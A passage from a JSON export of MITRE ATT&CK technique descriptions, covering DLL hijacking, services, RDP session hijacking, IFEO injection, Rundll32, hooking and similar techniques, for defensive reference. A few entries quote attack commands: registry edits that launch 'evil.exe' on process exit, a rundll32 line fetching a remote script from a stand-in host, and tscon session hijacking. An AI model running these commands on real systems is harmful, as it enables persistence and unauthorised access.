Hijacking","version":"1.0","description":"Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. \n\nAdversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. \n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\n\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.","tactics":["persistence","privilege-escalation","defense-evasion"],"externalId":"T1038","externalUrl":"https://attack.mitre.org/techniques/T1038"},"key":"mitre/dll-search-order-hijacking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"New Service","version":"1.0","description":"When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. \n\nAdversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).","tactics":["persistence","privilege-escalation"],"externalId":"T1050","externalUrl":"https://attack.mitre.org/techniques/T1050"},"key":"mitre/new-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Application Window Discovery","version":"1.0","description":"Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.\n\nIn Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.","tactics":["discovery"],"externalId":"T1010","externalUrl":"https://attack.mitre.org/techniques/T1010"},"key":"mitre/application-window-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Standard Cryptographic Protocol","version":"1.0","description":"Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.","tactics":["command-and-control"],"externalId":"T1032","externalUrl":"https://attack.mitre.org/techniques/T1032"},"key":"mitre/standard-cryptographic-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Hypervisor","version":"1.0","description":"A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.","tactics":["persistence"],"externalId":"T1062","externalUrl":"https://attack.mitre.org/techniques/T1062"},"key":"mitre/hypervisor"},{"type":"mitre","subtype":"technique","metadata":{"technique":"AppCert DLLs","version":"1.0","description":"Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.","tactics":["persistence","privilege-escalation"],"externalId":"T1182","externalUrl":"https://attack.mitre.org/techniques/T1182"},"key":"mitre/appcert-dlls"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Scheduled Transfer","version":"1.0","description":"Data exfiltration may be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.","tactics":["exfiltration"],"externalId":"T1029","externalUrl":"https://attack.mitre.org/techniques/T1029"},"key":"mitre/scheduled-transfer"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Winlogon Helper DLL","version":"1.0","description":"Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.","tactics":["persistence"],"externalId":"T1004","externalUrl":"https://attack.mitre.org/techniques/T1004"},"key":"mitre/winlogon-helper-dll"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Binary Padding","version":"1.0","description":"Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.","tactics":["defense-evasion"],"externalId":"T1009","externalUrl":"https://attack.mitre.org/techniques/T1009"},"key":"mitre/binary-padding"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Remote Desktop Protocol","version":"1.0","description":"Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.\n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)\n\nAdversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\\windows\\system32\\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)","tactics":["lateral-movement"],"externalId":"T1076","externalUrl":"https://attack.mitre.org/techniques/T1076"},"key":"mitre/remote-desktop-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exfiltration Over Other Network Medium","version":"1.0","description":"Exfiltration could occur over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries could choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.","tactics":["exfiltration"],"externalId":"T1011","externalUrl":"https://attack.mitre.org/techniques/T1011"},"key":"mitre/exfiltration-over-other-network-medium"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Authentication Package","version":"1.0","description":"Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=. The binary will then be executed by the system when the authentication packages are loaded.","tactics":["persistence"],"externalId":"T1131","externalUrl":"https://attack.mitre.org/techniques/T1131"},"key":"mitre/authentication-package"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Extra Window Memory Injection","version":"1.0","description":"Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Endgame Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)","tactics":["defense-evasion","privilege-escalation"],"externalId":"T1181","externalUrl":"https://attack.mitre.org/techniques/T1181"},"key":"mitre/extra-window-memory-injection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Launchctl","version":"1.0","description":"Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made  (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as launchctl submit -l  -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. \n\nAdversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.","tactics":["defense-evasion","execution","persistence"],"externalId":"T1152","externalUrl":"https://attack.mitre.org/techniques/T1152"},"key":"mitre/launchctl"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Domain Generation Algorithms","version":"1.0","description":"Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)","tactics":["command-and-control"],"externalId":"T1483","externalUrl":"https://attack.mitre.org/techniques/T1483"},"key":"mitre/domain-generation-algorithms"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Man in the Browser","version":"1.0","description":"Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)\n\nBrowser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)","tactics":["collection"],"externalId":"T1185","externalUrl":"https://attack.mitre.org/techniques/T1185"},"key":"mitre/man-in-the-browser"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Remote Services","version":"1.0","description":"An adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.","tactics":["lateral-movement"],"externalId":"T1021","externalUrl":"https://attack.mitre.org/techniques/T1021"},"key":"mitre/remote-services"},{"type":"mitre","subtype":"technique","metadata":{"technique":"DCShadow","version":"1.0","description":"DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC). (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) (Citation: BlueHat DCShadow Jan 2018)","tactics":["defense-evasion"],"externalId":"T1207","externalUrl":"https://attack.mitre.org/techniques/T1207"},"key":"mitre/dcshadow"},{"type":"mitre","subtype":"technique","metadata":{"technique":"File Deletion","version":"1.0","description":"Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)","tactics":["defense-evasion"],"externalId":"T1107","externalUrl":"https://attack.mitre.org/techniques/T1107"},"key":"mitre/file-deletion"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Private Keys","version":"1.0","description":"Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)\n\nAdversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\\Users\\(username)\\.ssh\\ on Windows.\n\nPrivate keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)","tactics":["credential-access"],"externalId":"T1145","externalUrl":"https://attack.mitre.org/techniques/T1145"},"key":"mitre/private-keys"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Modify Registry","version":"1.0","description":"Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.","tactics":["defense-evasion"],"externalId":"T1112","externalUrl":"https://attack.mitre.org/techniques/T1112"},"key":"mitre/modify-registry"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Defacement","version":"1.0","description":"Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. \n\n### Internal\nAn adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)\n\n### External \nWebsites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)","tactics":["impact"],"externalId":"T1491","externalUrl":"https://attack.mitre.org/techniques/T1491"},"key":"mitre/defacement"},{"type":"mitre","subtype":"technique","metadata":{"technique":"AppleScript","version":"1.0","description":"macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python  (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".","tactics":["execution","lateral-movement"],"externalId":"T1155","externalUrl":"https://attack.mitre.org/techniques/T1155"},"key":"mitre/applescript"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Browser Bookmark Discovery","version":"1.0","description":"Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\n\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials in Files](https://attack.mitre.org/techniques/T1081) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.","tactics":["discovery"],"externalId":"T1217","externalUrl":"https://attack.mitre.org/techniques/T1217"},"key":"mitre/browser-bookmark-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Image File Execution Options Injection","version":"1.0","description":"Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\\dbg\\ntsd.exe -g  notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where  is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nAn example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)\n\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\n* reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"C:\\temp\\evil.exe\"\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.\n\nMalware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)","tactics":["privilege-escalation","persistence","defense-evasion"],"externalId":"T1183","externalUrl":"https://attack.mitre.org/techniques/T1183"},"key":"mitre/image-file-execution-options-injection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Rundll32","version":"1.1","description":"The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)","tactics":["defense-evasion","execution"],"externalId":"T1085","externalUrl":"https://attack.mitre.org/techniques/T1085"},"key":"mitre/rundll32"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Modify Existing Service","version":"1.0","description":"Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).\n\nAdversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\n\nAdversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)","tactics":["persistence"],"externalId":"T1031","externalUrl":"https://attack.mitre.org/techniques/T1031"},"key":"mitre/modify-existing-service"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Communication Through Removable Media","version":"1.0","description":"Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.","tactics":["command-and-control"],"externalId":"T1092","externalUrl":"https://attack.mitre.org/techniques/T1092"},"key":"mitre/communication-through-removable-media"},{"type":"mitre","subtype":"technique","metadata":{"technique":"File Permissions Modification","version":"1.0","description":"File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). (Citation: Microsoft DACL May 2018) (Citation: Microsoft File Rights May 2018) (Citation: Unix File Permissions)\n\nAdversaries may modify file permissions/attributes to evade intended DACLs. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1015), [Logon Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files.","tactics":["defense-evasion"],"externalId":"T1222","externalUrl":"https://attack.mitre.org/techniques/T1222"},"key":"mitre/file-permissions-modification"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Hooking","version":"1.0","description":"Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)","tactics":["persistence","privilege-escalation","credential-access"],"externalId":"T1179","externalUrl":"https://attack.mitre.org/techniques/T1179"},"key":"mitre/hooking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Firmware","version":"1.0","description":"The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.","tactics":["persistence"],"externalId":"T1019","externalUrl":"https://attack.mitre.org/techniques/T1019"},"key":"mitre/system-firmware"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Change Default File Association","version":"1.0","description":"When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at 